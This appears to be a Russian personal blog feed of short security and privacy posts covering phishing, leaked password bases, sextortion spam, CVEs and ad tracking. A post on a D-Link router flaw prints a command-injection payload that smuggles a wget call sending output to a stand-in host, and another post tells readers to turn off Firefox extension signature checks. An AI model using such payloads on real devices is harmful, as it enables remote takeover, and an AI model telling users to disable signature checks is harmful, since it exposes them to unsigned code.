qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Сайт oplatagosuslug . ru и сотрудничающие с ними Моби.Деньги (указаны как nkomobi . ru )- мошенники, причём, возможно, кто-то из сотрудников gosuslugi.ru и nalog.ru предоставил им возможность ТАК работать и дал доступ к базам или к API.

1. Работает логин через eisa.gosuslugi.ru
2. В самом деле поступает от них осмысленная информация по налогам и ЖКХ по недвижимости.
3. Мелкие (до ~тысячи рублей) суммы через них успешно оплачиваются и доходят до лицевых счетов по указанным платёжным реквизитам, реквизиты верные.
4. Более крупные суммы идут "налево".

Я за невнимательность поплатился. :)
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Попросили починить некий сайт на вордпрессе.

Сейчас на нём нет ни одного узера с правами админа, при создании и стандартных методах восстановления прав ничего не получается.

Исследование показало, что взломан он был, скорее всего, раньше, чем выложен на первый боевой хостинг.

Но этого мало.

Незамутнённые зареганные пользователи загружали на сайт подписанные ими и сосканированные документы о согласии на обработку персональных данных. Такой-то, ФИО. Паспорт такой то, зарегистрированный там-то, действую в интересах..., подписи.

И ВСЕ эти документы НЕДОСТУПНЫ в сети по прямым урлам вотпрямщаз только потому, что домен не продлили... А так были доступны весьма долго и (по кр.мере частично) индексировались поисковиками.

в ЖЖ
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Утро понедельника. Норот воет от ужаса. Mail.Ru не логинится.

Только что на мой почтовый сервер (не один) пошли попытки логиниться с различных IP на тестовые почтовые ящики, которые я сотворил в рамках проверки в 2015 году...

Это означает, что ПО КРАЙНЕЙ МЕРЕ состояние базы mail.ru по крайней мере паролей для сбора почты с других ящиков на ПО КРАЙНЕЙ МЕРЕ сентябрь 2015 года совершенно точно стало достоянием злонамеренных людей в интервале между 2015 и 2020 годом.
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Вот у меня профиль от старой Мозиллы.
Вот я апгрейд делаю на новую.
Новая убивает все сохранённые логины и пароли.
Но я хитрый - я бекап в файл из старой версии сделал.
В новой версии, в еёной LockWise - НЕТ варианта Импорт из файла.
Надо находить расширение, которое это умеет.
Ищем в сети - старые знакомые проверенные расширения тиа Password Backup - отсутствуют.
Ищем в сети что говорит народ.

Грят - lastpass умеет иморт из файла ЛОКАЛЬНО.
Ставим.
Грят - создайте аккаунт с длинным мастер паролем и... емейлом.
Грят - подпишите лицензионное согласшение что на всё согласны.

Проходим процидурку.
Видим охеренный интерфейс, в котором на каждом шагу нам предлагают купить Про версию.
Находим импорт из файла - бинго!
Файл в формочку АПЛОАДИТСЯ на сайт lastpass.com!
При отсутствии интернета не позволяет совершить импорт файла.

чОртд.

Вот даже интересно - есть ХОТЬ ОДИН плагин работы с паролями к файрфоксу 70+, который ТАК НЕ ДЕЛАЕТ?

Подскажите, может знаете?
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Тут массово народу сыплется спам о том, что почтовый ящик взломан, вот доказательство, вот пароль, шлите биткоины бочками, а то мы расскажем всему миру чем вы занимались рассматривая некоторые картинки...

Все приходящие мне лично письма этого содержания позволяют мне лишь ехидно ухмыляться, так как в большинстве случаев мне очевидно, что это пароль, вытащенный из дампа базы конкретного форума, емейл оттуда же. Причём на каждом таком ресурсе емейл я использую УНИКАЛЬНЫЙ, потому мне прекрасно видно, откуда ноги растут. Причём к этому емейлу невозможно применить ни на каком сервере никакой пароль, а не то что "вот этот самый".

В том числе за попаданием таких баз на расшифровку паролей (и засвечивание конкретно моего емейла) засветились фирмы Adobe и Apple, соцсети "Яндекс Район", Фейсбук и Вконтактик. Микрософт пока нет. :)

Однако.

Недавно я написал "на коленке" для почтового сервера простейший скрипт, который очевидным образом проверяет нерадивость владельца почтового ящика, на который пришло сообщение о взломе, содержащее якобы пароль от оного.

И запустил его на нескольких контролируемых мной серверах. В 480 из 600 ящиков данный момент лежит хотя бы одно сообщение, содержащее РЕАЛЬНЫЙ, вот прямщаз подходящий пароль от ЭТОГО ящика.

Выборочный опрос 20 владельцев из этих 480-ти показал, что все эти люди (кроме одного) используют ВЕЗДЕ ОДИН пароль или "один из двух-трёх любимых".

Не надо быть как эти люди.
Не надо быть как эти фирмы, форумы и соцсети.
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Сразу после логина Qiwi кошелёк сообщает забавное: "Теперь не нужно вводить данные для идентификации вручную — мы найдем их в наших сервисах" - сам настойчиво предлагает ввести персональные данные чтобы увеличить лимиты по кошельку... Теперь говорит, что всё за меня сделает, только кнопочку вот нажми. Так скоро и без нажатия на кнопочку всё найдёт.

Мне это напоминает "Так вы за меня и есть будете?!" (С)тарый мультик...

http://qfc.qkowlew.org/q-qhome-2019-11-22_105917.png
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
приложение Qiwi кошелёк неожиданно впало в паранойю.

При вводе входного кода сообщает, что соединение небезопасно и предлагает присоединиться к "безопасной WiFi сети или мобильному интернету". Независимо от того, куда на самом деле присоединён в этот момент мобильник (WPA2 via 801/n или мобильный интернет).
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)".

Наличие уязвимости официально подтверждено в моделях:

  • DIR-655 с прошивкой 3.02b05 или старее;
  • DIR-866L с прошивкой 1.03b04 или старее;
  • DIR-1565 с прошивкой 1.01 или старее;
  • DIR-652 (данных о версиях проблемных прошивок не приводится)
Время сопровождения данных моделей уже истекло, поэтому компания D-Link заявила, что не будет выпускать для них обновления с устранением уязвимости, не рекомендует использовать и советует заменить на новые устройства. В качестве обходного пути защиты можно ограничить доступ к web-интерфейсу только для заслуживающих доверия IP-адресов.

Позднее выяснилось, что уязвимость также затрагивает модели DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 и DIR-825, о планах по выпуску обновлений для которых пока ничего не известно.

Отсюда
по этому материалу

qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
upd около 8 утра по Москве: вроде починилось.

1. Перестал работать imap/pop3 с почтовыми клиентами
2. Глючит авторизация везде, где она завязана на гугль
3. У кого синхрятся закладки и пароли через гугль или бекапятся через акк в гугле - ОСТОРОЖНО. Два человека уже потеряли ВСЕ данные, которые так синхрились.
4. Проблемы в discord, в каких-то акках Slack
5. https://bgpstream.com/event/205361
6. Многие облачные сервисы не пашут,мне несколько человек ноют про вебкамеры на облако завязанные.
7. Google Safe Browsing "мерцает", в результате для части народу "инет очень сильно тормозит", хотя при этом файло большого размера качается быстро.
8. На Youtube поломано много стримов.
...что-то ещё...

Началось лето, и некоторая доля даже очень ответственных админов таки удалилась в отпуск и отключила средства связи чтобы отдохнуть...

шутят, что это РКН дотянулся и с помощью оборудования Хуавея построил в СЩА филиал Великого китайского файрволла руками северокорейских хакеров.
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Анекдоты про то, что на глиссаде пилоту предлагается оплатить онлайн процедуру посадки, так как закончился тестовый бесплатный период, всё ближе к буквальному воплощению.

«The software delivered to Boeing linked the signal with a
second cockpit gauge -- available for a fee -- that displayed the readings
from the two vanes. As a result, the AOA disagree light, which warned pilots
of issues with the sensors, functioned only for customers that purchased the
optional indicator.»

По моему, программные хакеры ещё не успели добиться стольких трупов, скольких уже добились фанатики логики "Сантик! Сантик!" (С) Николай Носов.
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Процесс уничтожения конкурентов Гуглу продолжается.
Можете считать меня конспирологом, да.

Но в сообществе Мозиллы за некоторое недавнее время было принято НЕМАЛО решений, существенно ухудшивших перспективы этого браузера.

Обрушения всех старых плагинов со сменой движка браузера было им мало.
Теперь в "main stream" Firefox "неожиданно" перестали работать и новые расширения, так как сломался механизм проверки их подписи... сертификатом самой Мозиллы.

Если у вас вот прямо сегодня перестал работать любимый uBlock или иной плагин, без которого жизнь в интернете не жизнь.
Чинится так:

- Сделать бекап профиля Мозиллы!
- Установить DEV/Nightly версию Мозиллы
- в адресной строке about:config и сказать, что согласен на то, чтобы все могло рухнуть
- xpinstall.signatures.required установить в false

У Витуса тоже лирично
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
1. Сербанк добавил мне в избранное World of Tanks по своей инициативеВ личном кабинете Сбербанка у меня появилась ссылочка на оплату World of Tanks.
БЕЗ МОИХ НА ТО действий.

2. При форме логина в Сбербанк присутствует Adobe flash приложение, при разлогинивании не стираются куки, в результате ввод пароля выглядит (вместо логина и пароля - только пароль) вот так:
Сербанк сдаёт cookies   злоумышленникам и Adobe

Прекрасный коммент с канала #anime:

DarkElve> сбер посадил картоху между грядок
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
скриншот письма в почте Постоянное место этого текста - там

Оплата продления

Что это такое?

Якобы от регистратора домена вам приходит письмо с предупреждением о блокировке домена за его неоплату. Это письмо может выглядеть даже в точности так же, как уведомление от настоящего регистратора. Интересно, что такие письма приходят как незадолго до срока окончания делегирования домена, так и ПОСЛЕ.

Почему это опасно?

  1. Вы можете по невнимательности нажать на кнопку и попадёте на фишинговый сайт, где вам предложат пополнить баланс и оплатить продление домена, а на самом деле деньги уйдут левым людям, а домен продлён не будет!
  2. Мошенники рассылают этот тип спама по всем раскопанным в интернете емейл адресам, относящимся к одному домену. Кроме того, большинство настоящих напоминаний о продлении приходит не одному человеку. В результате "один человек продлил домен по настоящему", а "другой отдал деньги мошенникам, но не понял этого, так как сайт то работает..." В настоящее время у нас на хостинге есть сайт, домен которого таким образом в 2018 году "продлили" ШЕСТЬ человек, получателей рассылки по нему. И мы даже точно не знаем, кто из шестерых продлил по настоящему, а кто отдал деньги за просто так.
  3. При включённом отображении HTML писем в веб интерфейсе почты и в аутлуке часть картинок в сообщении загружается с сайта злоумышленников, тем самым поставляя им существенную информацию о вашем броусере и о факте прочтения письма в броусере. Эта информация имеет ненулевую ценность на рынке спама ("данный адресат не удаляет письма сразу, читает их в html виде...), и в дальнейшем у вас есть перспектива получить фишинговые письма, более точно оттаргетированные на вас. В результате в будущем вы можете, сами того не заметив, потерять этот домен или попасться на иные "разводки".
  4. Если вы попались более одного раза - скорее всего, на вас опробуют и более серьёзные разводки типа требования подтвердить владение доменом .org/.com/.net, для чего надо сгенерить код его передачи.

Как уменьшить вероятность ошибки

  1. Платёжные системы разнообразны, а за год, прошедший со времени предыдущей оплаты вашего домена, и регистратор мог сменить формочку логина, схему оплаты с paymaster на platron какой-нибудь, и ваша карта могла отэкспайриться, а вы - сменить любимый банк... Поэтому когда вы уже запустили процедуру оплаты - вы не всегда сможете достоверно понять, что платите "куда надо". На что мошенники и рассчитывают.
  2. Тем не менее (рекомендация от Кира Злобина, которую мне напомнил Шаплов) Не пользуйтесь никакими формами логина кроме тех которые вы лично добавили в закладки. Для каждого используемого сайта надо добавить в закладки ссылку на форму логина. И всякий раз когда у вас вдруг внезапно или даже планово спрашивают логин-пароль, не пользоваться предложенной формой, а идти в закладки и пользоваться проверенной.
  3. Пользоваться почтовыми программами, которые по умолчанию показывают письмо в виде plain text, а при отображении HTML версии письма показывают полный список ссылок и внешних изображений
  4. Вместо перехода по ссылке из письма использовать для перемещения денежных средств проверенные, стабильные пути. Конкретный совет тут дать сложно, конечно.

Заразить сайт своими руками

Якобы от регистратора домена или от "вышестоящей организации" приходит требование подтвердить владение доменом путём помещения в корень сайта файла с расширением .PHP.

Если вы выполняете инструкции из такого письма, злоумышленники получают полный доступ ко всем файлам и базам данным вашего сайта.

Несмотря на кажущуюся очевидность этой подлянки, вебмастеров низкой квалификации оказывается достаточно немало.

Код передачи домена

Для международных доменов есть процедура передачи другому регистратору и по коду. Домен может быть зарегистрирован у регистратора, язык интерфейса которого не вполне понимает часть сторудников компании, да и круг сотрудников может меняться на протяжении существования сайта.

Фишинговые письма этого типа обычно написаны от имени "вышестоящего международного регистратора" и требуют "подтверждения владения доменом", для чего подробно описывают процедуру именно генерации кода для передачи домена другому регистратору или администратору домена.

Сотрудник, недостаточно хорошо знающий язык интерфейса, может, однако, выполнить присланные инструкции, как обезьяна...

В чём опасность

При выполнении этого типа инструкций вы полностью лишаетесь контроля над доменом, хотя формальным владельцем можете даже оставаться. Возвращение так потерянного домена требует как минимум обращения в судебные инстанции той страны, в которой находится регистратор домена, ПОЛУЧИВШИЙ контроль над захваченным доменом.

Как уменьшить вероятность ошибки

Повышение квалификации сотрудников, запрет на "исполнение действий по механической схеме без понимания".

Также На Golos.io

qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
https://www.libssh.org/security/advisories/CVE-2018-10933.txt

Вот блин, хохма. Если передать серверу пакет "Аутентификация успешна" вместо пакетика "Узер просит аутентификацию", то... Сервер соглашается и пускает.
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Дома висит открытой страничка https://yandex.ru/ugcpub/cabinet
в которой периодически появляются предложения оставить отзыв о местах, в которых я побывал.
Заведения рядом с домом они почти все уже перебрали...
То, что я с телефоном в руках ходил в ТРЦ "Водный" - тоже очевидно отразилось на предложениях оставить отзыв.

Вчера я вышел из дома и поехал в Нескучный сад на встречу "старых пней", о которой мне сообщено было по Джаберу, логи которого точно не индексируются.

Аккум телефона сел в ноль не доходя до метро, и телефон точно выключился и более не включался.
Но так и оставался в кармане.

В процессе поездки ПОСЛЕ выключения телефона я дочке неоднократно объяснял маршрут, как мы и где делаем пересадку.

Сегодня утром, когда я эту страницу отрефрешил, Яндекс предложил мне оставить отзывы об аптеке ГКБ№1 им. Пирогова (Ленинский проспект, д.8) и о трёх магазинах в непосредственной близости от остановки троллейбуса "Больница Святителя Алексия".

UPD1: у дочки телефона нет
UPD2: похоже, по телефону супруги, которая была там же вчера. :)
То есть связка "супруга там была, мы знаем, что это супруга,..."
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
1. МТС поздравила мою жену в настоящий её день рождения, а не в тот день рождения, что указан в паспортных данных симки в её телефоне.

Как раз выходит закон про ответственность на тему соответствия паспортных данных, хехе.

2. Жена уговорила меня сбрить бороду. Так как без бороды она меня ещё ни разу не видела живьём. Об этом говорилось ТОЛЬКО УСТНО, изредка. Но как-то станок всё купить забывал. В тех местах интернета, где у меня выключен АдБлок - мне стали показывать рекламу бритвенных станков. Спасибо, напомнили.

Так что я щас без бороды. :)
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Дизайн края ванной с подсветкой от гастабайтеров-м...ков

Увидел у вроде бы разумного человека вот такой пост в фейсбуке...
Поясняю:

  1. В электричестве, которое попадёт тебе в тело, напряжение не важно. Важен получающийся ток, который пройдёт через критичные внутренние органы.
  2. Внутренние органы человека - хороший проводник с низким сопростивлением (грубо - КИЛОом).
  3. СУХАЯ кожа человека - плохой проводник с высоким сопротивлением (грубо - мегаом)
  4. Мокрая кожа человека - хороший проводник с низким сопротивлением. КИЛОомы. То есть при намокании сопротивление кожи падает в ТЫСЯЧИ раз.
  5. Ток равен напряжение поделить на сопротивление.

    12 вольт поделить на 1 мегаом - 12 микроампер.

    12 вольт поделить на 1 килоом - 12 миллиампер.

  6. ток, опасный для человека - более 15 мА, при которой человек не способен освободиться без посторонней помощи. Сила тока в 50 мА способна причинить сильный ущерб здоровью, а в 100 мА при воздействии 1-2 секунды считается смертельно опасной и обычно вызывает остановку сердца.
именно поэтому в сухих условиях 12 вольт и получающиеся МИКРОамперы - практически гарантированно безопасное оборудование.

именно поэтому 12 вольтовая разводка электричества в МАКСИМАЛЬНО мокрых условиях - вряд ли тебя мгновенно убьёт, но очень легко подойти к границе "судорога и ты сам не можешь освободиться".

В моей практике электрика БЫЛО оттаскивание человека без сознания от пруда. Источником тока для нанесения ему электрического удара стал оставленный там кем-то включённый сварочный трансформатор с выходным напряжением ВСЕГО ЛИШЬ 7 вольт, которые я померял тестером потом, когда оттащил.

постоянное место этого текста в сети - там

ссылка в фейсбук

qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Сейчас отношения людей с информацией - это:
  • насрал посреди улицы
  • вытер жопу пальцем
  • пошёл дальше, обтирая руку о стены.
Моё. Давно.
Последовательность событий.
  1. Человек в соцсети обретает (не так важно, почему и как - у нас у всех рано или поздно так получается) некоторое количество злобных недоброжелателей.
  2. В процессе общения выясняется, что именно подзамочные посты систематически оказываются достоянием гласности.
  3. Человек продолжает писать подзамочные посты, искренне думая, что так обеспечивает "приватность в узком кругу".
  4. Когда очередной такой пост, причём с достаточно подробным описанием сомнительных с правовой точки зрения действий, очередной раз оказывается "снаружи" - визжит и обещает "попортить жизнь" тому, кто из френдов вынул из под замка.
  5. Я объясняю, что для того, чтобы это говно вместо канализации попадало куда не следует, НЕ ТРЕБУЕТСЯ сознательного вынесения собеседником подзамочного текста. Просто потому, что в БОЛЬШОМ количестве френдов хватает тех, кто неаккуратно обращается с собственными ящиками электронной почты, и есть ещё сбор почты с нескольких ящиков, форвард с ящика на ящик. "Достаточно одной таблетки". Достаточно небольшой дырочки чтобы ВОНЯЛО. Достаточно одной сделанной тобой самим ошибки.
  6. Причём "попавшее наружу" невозможно удалить, стереть, отредактировать. Оно ВСЕГДА УХОДИТ туда, где ни ты, никакой админ соцсети не можете его отконтролировать и даже обнаружить путь ухода (если раскрывающий не полный идиот).
  7. И вот после всех объяснений, написав объяснявшим, что "всё понятно", человек делает следующие три смешные вещи
  8. Стирает или прячет "под глаз" (только для себя) подзамочный пост
  9. Пишет Красивое Философское Рассуждение о том, что есть вот такие "Мухи, которые любят говно и производят говно", а "я какаю розовыми бабочками", и "им не понять и мне не понять"
  10. Скринит мой коммент под этим философическим рассуждением, где я пытаюсь объяснить, что вот ни хрена не розовыми бабочками, а какают как раз все. Просто кое кто ещё и прямо посреди улицы.
Чума
Постоянное место этого текста в сети...

Немного подробнее о том, как может сливаться инфо из подзамков )

qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Стереть куки.
Но именно ВСЕ куки, где как либо упоминается livejournal - БЕЗ "расширения .com"!!!

http://qkowlew.org/
В Firefox - тут надо вот так и удалить все найденные.
qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (Default)
Я тут купил (после примерно годичного перерыва) 1кг гороха. Оплатил карточкой. Пришёл домой, сел за комп - и во ВСЕХ трёх местах, где у меня отключен адблок - мне показали рецепты горохового супа. Sapienti sat.